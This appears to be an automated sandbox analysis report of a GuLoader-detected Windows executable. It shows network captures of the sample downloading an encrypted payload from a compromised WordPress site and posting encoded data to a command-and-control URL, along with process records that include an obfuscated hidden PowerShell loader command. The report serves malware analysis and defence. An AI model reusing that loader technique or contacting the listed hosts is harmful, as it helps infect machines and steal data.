                                              Jan 15, 2025 17:37:48.298095942 CET214OUTGET /wp-includes/block-bindings/wTryLAihFvcVmUK202.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                              Host: electricsuitcase.net
                                              Cache-Control: no-cache
                                              Jan 15, 2025 17:37:48.886574984 CET1236INHTTP/1.1 200 OK
                                              Server: nginx
                                              Date: Wed, 15 Jan 2025 16:37:48 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 114752
                                              Last-Modified: Sat, 11 Jan 2025 08:23:23 GMT
                                              Connection: keep-alive
                                              ETag: "67822a7b-1c040"
                                              Accept-Ranges: bytes
                                              Data Raw: f5 e1 cf 10 48 82 15 75 92 de b7 df b9 df 78 81 26 5d ab 93 43 0c ac 24 13 bc 6c 0a 14 b8 d8 e3 d1 a8 a3 9c 98 df 75 9d 56 21 0e 42 48 6b 36 12 ed 59 e8 7e 3a 93 a1 52 0c c6 4e dd 37 35 8e e4 e4 ea ae f3 80 ef e5 12 10 12 1c ab 44 28 21 f8 f7 9e e1 26 69 53 e0 0c 18 be 9a f2 d8 b1 c1 c6 be fe 10 20 0c 13 c8 1c 18 cf c8 16 33 d3 c9 27 11 dc 2e d6 b7 88 fe 26 cc 33 33 49 86 55 af e7 7a 93 a0 ee 18 7a 13 19 e3 be 2e 06 84 21 db ee 8a 8d dd 17 15 3a 47 db 44 99 58 c7 04 58 01 70 e6 cc 09 29 ce 30 62 aa ee 2c a3 0e b8 c1 b1 ca 9c fb 13 3e 7d 50 5b b4 95 84 2e 76 1a bb 1c 06 7f f0 53 67 23 aa 88 69 c3 ad f9 bc a1 b8 ca 12 41 b2 1e 5b d9 17 87 c7 c0 77 33 59 b0 97 92 e8 14 59 2f 57 9e be ba 6f c7 48 70 0c d8 f9 c8 87 11 00 34 04 90 41 4d fb fb 13 2d 03 5b 08 13 bf cd f9 55 f5 9f 3f 99 4f fa 40 59 bd bb aa 5f 1d 10 96 ae 36 00 4d 93 86 f0 ef 5c d2 ed f3 8d 9f bd bb be 1b 7e fb 54 16 62 de b6 40 d7 de 87 c6 8e af 7c e5 46 b6 ea 0f ff 37 f7 20 e4 8f 1a 5e a1 89 1b 8a 0a 11 51 26 84 eb c6 4c 02 91 11 ca 08 d9 [TRUNCATED]
                                              Data Ascii: Hux&]C$luV!BHk6Y~:RN75D(!&iS 3'.&33IUzz.!:GDXXp)0b,>}P[.vSg#iA[w3YY/WoHp4AM-[U?O@Y_6M\~Tb@|F7 ^Q&Lg~kih88lC6i\*%lK`y\HQlu^39e0jL%|hLr5KQ'g%yVny-[)#dBY-)>:s6JX-V0Fy!k<8Rjr<pEnh9Rd]T@4lJ48[{E<BQ(:%K6)v?I?x\&7f=Hlo".]tGZK'EJPyow E!^@}b&u3x+"IO?]f\&KM;k vED*Dsc3bH!-H(Z=i0>Eb]U6t[vKOG1=vGgb!lX}&rf{& px@Y1UvM%I SYImv,>B">2}%)r|]0`D$RX){H 5;W.1(#
                                              Jan 15, 2025 17:37:48.886595011 CET1236INData Raw: 64 e5 d0 ae 99 1a 88 21 9f 63 19 95 ba 87 bf 2d 49 dc c7 c7 c7 4d 90 da 80 73 78 04 bd d3 c4 83 92 d8 cd f0 5e 2c f8 00 e2 05 e1 2f 91 6d a3 28 db b5 51 17 23 5e 36 8b 3e 37 ef ff b2 1d 8a 8a 00 20 80 55 ab 04 61 09 6f 17 93 fb bd 51 5b fa c3 cc
                                              Data Ascii: d!c-IMsx^,/m(Q#^6>7 UaoQ[:x~h$PdXD=$*fluN3{*qsL_Z! T8U9W@J|a/0d9B-FmJfCUojAZXym
                                              Jan 15, 2025 17:37:48.886619091 CET1236INData Raw: 7b 19 99 82 8a f1 44 69 9b 79 0f 10 a3 e1 3f 7a d9 bb b1 30 56 90 7a df 57 d3 eb 9a 92 50 5c c3 53 03 cf af 97 b4 cd 8d 61 7c f7 0c 19 57 a2 04 dc 5d b2 c0 20 ce 62 00 23 1d a6 c1 a0 6e 71 95 98 be 2c d1 ec 6f 7e e1 9f c4 24 8f 9d dd 6d bf 2d 8d
                                              Data Ascii: {Diy?z0VzWP\Sa|W] b#nq,o~$m-4tUL<&x3\+AY-u+}V#peDs$`qH8hVo0|O1p*APj]|6_[^gf_TV-:c9|)%~5t!(E]%
                                              Jan 15, 2025 17:37:48.886635065 CET672INData Raw: 53 03 68 4b c5 d0 67 3c 3e 95 1d 71 4c 2e 5d 55 7e 99 db da 82 f0 1f 5d 46 96 45 75 84 71 ab ac a9 0f 81 d5 2a de e4 e5 46 c5 e6 22 2a bc 05 02 60 8b fd 75 3f a1 d3 54 85 ee 99 c4 fc 68 eb 81 93 3d 99 7c 72 21 06 1d 22 fc 01 ed 76 3b a4 98 52 e2
                                              Data Ascii: ShKg<>qL.]U~]FEuq*F"*`u?Th=|r!"v;R8:,D,,KW9<$X-D0\ ED`<^<Mo0Y]?71Q2$aZ5^qU$U}lat/o,Wer?n=w11
                                              Jan 15, 2025 17:37:48.886692047 CET1236INData Raw: a8 15 66 3f b4 c8 cc f2 0c d8 f9 43 ec 19 8b f1 07 d3 4d c6 2b 76 1f 1a 28 8a 8b e9 b3 b2 fd de 0d b4 c1 12 89 d1 85 da 45 b7 d7 4b 90 5c b2 af bd d6 66 c0 8e f3 38 d7 17 05 36 76 60 42 50 af 96 32 df 55 9d b5 5d 5c 44 5a 98 83 2e 3c 54 83 1a cd
                                              Data Ascii: f?CM+v(EK\f86v`BP2U]\DZ.<TzoZ1zXBBkrt{VF[{\Buet{':dKyyeO]w&zrQq7y]Y{B! N%5U_d
                                              Jan 15, 2025 17:37:48.886708021 CET1236INData Raw: ab d9 69 b5 42 cf f3 ad b4 72 40 44 21 41 8e b0 0f f8 40 a7 77 a8 b2 09 2d cb 8f 49 85 79 47 91 e9 e0 49 4f eb e1 54 9d 06 bb 2e da ff 37 15 ad 5b 6b 09 f7 02 1d 71 7d 5a 83 60 a4 ed 0c 6c 6f 03 9e fe f6 27 0e 1d b0 89 46 69 00 69 79 5f ca f0 87
                                              Data Ascii: iBr@D!A@w-IyGIOT.7[kq}Z`lo'Fiiy_|{bFTA^,gih`u&|;uAO+M"{^4>z\Cq<`QI'O.X({hp13#hwcUl8Mu\1n/b0?A
                                              Jan 15, 2025 17:37:48.886723995 CET448INData Raw: fc 49 bd f5 a2 05 ec 16 4d b2 c7 29 a3 df bd 25 71 37 b4 e1 df 30 06 1f 18 f8 00 aa 44 8c 18 af 96 07 73 63 50 2e 6a e5 fc d2 aa f8 da b7 88 7d c6 a4 ee 70 53 c5 48 a1 4f b8 ba b9 0f d5 68 3f 3e 45 75 a5 e9 e9 af de 21 60 d7 0b 33 fe ac 9b d3 7d
                                              Data Ascii: IM)%q70DscP.j}pSHOh?>Eu!`3}Axa>D{ RWG[h4zV_-q3fHfQ6t%Y;!4@xWFLqniu9`|&^*,VyCeAbmb%H[v
                                              Jan 15, 2025 17:37:48.886869907 CET1236INData Raw: 88 47 9e 89 3b 57 ea 18 7d 45 26 42 b2 bd d4 ab 3a af a6 a5 4d c4 4f f1 6e 29 b0 05 d0 bd 3f 28 48 a4 ec d7 06 27 a9 8e fd f0 1b 79 29 7e 16 b6 8d 89 79 1e 72 bb f8 b6 b0 ba 72 c0 f7 c9 9d d2 92 2a 22 26 df 46 35 ac b8 1d da 87 1e 41 0f b9 26 3b
                                              Data Ascii: G;W}E&B:MOn)?(H'y)~yrr*"&F5A&;+]q^X\|##qhXCnUf{_1l.P3E^HN]Kp""/.ptUfF6,4#n@%G+2!HKe%|_y\UM) ~
                                              Jan 15, 2025 17:37:48.886887074 CET1236INData Raw: 10 04 c5 99 f3 0c 32 07 1e d3 66 14 d3 77 44 82 d0 81 b6 12 c3 a2 55 9d 07 de e9 7f 52 e8 c4 9f cf b3 8c 66 91 6e f9 f9 2c 6b 59 04 13 ce 86 18 30 24 83 ed 4a 02 4c 1d d4 8b 0d c1 42 0d 3a c9 21 20 9d 07 d9 8f 7d c9 f2 99 5a 29 b9 46 c1 bf 43 b1
                                              Data Ascii: 2fwDURfn,kY0$JLB:! }Z)FCtYz97u<27*t_N4$@)= R[@vzi$ln#Fjs9K'NJ4S-Kj~c9?FOM_Remo%d9>F
                                              Jan 15, 2025 17:37:48.886903048 CET448INData Raw: 10 e8 87 a7 01 ce c8 d5 2c 0b d5 0a 9e 67 9d 88 72 c5 5a 6f 65 d8 69 b4 d9 17 cd 99 d2 fa 0a 2d d0 be dc 5c ee 80 85 9f 07 f7 d7 98 47 11 d6 70 1a 08 04 37 08 62 82 93 f7 5a e2 45 d4 da 89 74 60 80 0a fe fe 8e 54 fc fc 49 32 99 07 3f 72 25 46 a8
                                              Data Ascii: ,grZoei-\Gp7bZEt`TI2?r%FLXKhI$[2]r-:@i(TB*ZbkEg%Ug78g#GgX8:(Bi<ZnY5C("^~!Fhzn8nA 2*&,s
                                              Jan 15, 2025 17:37:48.891781092 CET1236INData Raw: b7 01 81 77 00 99 13 a3 54 a9 14 d0 3a 6f 58 ff ba e4 85 4c d3 10 18 b8 c8 6f d4 fe cb fb 56 44 69 3b ba 13 2d eb 3a f7 ec 40 0e aa 03 a2 21 5f 29 0e fa f1 49 36 a6 aa ef 5c 10 1d 6d 89 0a 4d 93 86 69 18 a3 52 2f c3 be 5f 37 7a 36 0f 78 70 97 ad
                                              Data Ascii: wT:oXLoVDi;-:@!_)I6\mMiR/_7z6xph@N)|MV>3m[^3Ga&n.,u>R .=@o4Y@lO`WlK:z[X8DLr1,Lvto;#vyE&d


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.652410104.21.32.1801944C:\Windows\SysWOW64\msiexec.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 15, 2025 17:37:49.501498938 CET273OUTPOST /PL341/index.php HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                              Host: b2csa.icu
                                              Content-Length: 111
                                              Cache-Control: no-cache
                                              Data Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9a 26 66 9d 45 70 9d 36 70 9d 34 10 8b 30 63 8b 30 6c 8b 31 11 e8 47 70 9d 35 13 8b 30 64 8b 30 61 8b 30 6d eb
                                              Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&fEp6p40c0l1Gp50d0a0m
                                              Jan 15, 2025 17:37:49.965646029 CET1236INHTTP/1.1 403 Forbidden
                                              Date: Wed, 15 Jan 2025 16:37:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Frame-Options: SAMEORIGIN
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTVYzcncbwZN93Zokk1tNPrNLZiYYMYKHAu2EIUPoeNNWthLUFPlwVBGThHp%2FyMTu5eqdNVYBd1rh5anhsst%2FckwQuqqF4dAP3ZVKtDqn3jU6%2B6t3qsGTbUbAwE%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 90274aeafed88ce6-EWR
                                              Data Raw: 31 31 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 [TRUNCATED]
                                              Data Ascii: 11d0<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-c
                                              Jan 15, 2025 17:37:49.965702057 CET1236INData Raw: 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74
                                              Data Ascii: ss" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (
                                              Jan 15, 2025 17:37:49.965737104 CET1236INData Raw: 69 73 68 69 6e 67 2e 3c 2f 73 74 72 6f 6e 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 50 68 69 73 68 69 6e 67 20 69 73 20 77 68 65 6e 20 61 20 73 69 74 65 20 61 74 74 65 6d 70 74 73 20 74 6f 20 73 74 65 61 6c 20 73 65 6e 73 69 74
                                              Data Ascii: ishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p>
                                              Jan 15, 2025 17:37:49.965773106 CET1236INData Raw: 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65
                                              Data Ascii: -0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">90274aeafed88ce6</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</spa
                                              Jan 15, 2025 17:37:49.965806007 CET175INData Raw: 2d 2d 20 2f 2e 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 2d 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72
                                              Data Ascii: -- /.error-footer --> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>0


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:11:37:00
                                              Start date:15/01/2025
                                              Path:C:\Users\user\Desktop\DOCU800147001.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DOCU800147001.exe"
                                              Imagebase:0x400000
                                              File size:963'872 bytes
                                              MD5 hash:AB99E49A4471901468BBBD9CCF228DE0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:2
                                              Start time:11:37:01
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:powershell.exe -windowstyle hidden "$Omrystede=gc -raw 'C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve';$Advancement=$Omrystede.SubString(71452,3);.$Advancement($Omrystede) "
                                              Imagebase:0xb20000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2547628074.000000000B13B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:11:37:01
                                              Start date:15/01/2025
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff66e660000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:11:37:40
                                              Start date:15/01/2025
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                              Imagebase:0x7ff7934f0000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2613773694.0000000005D6B000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Reset < >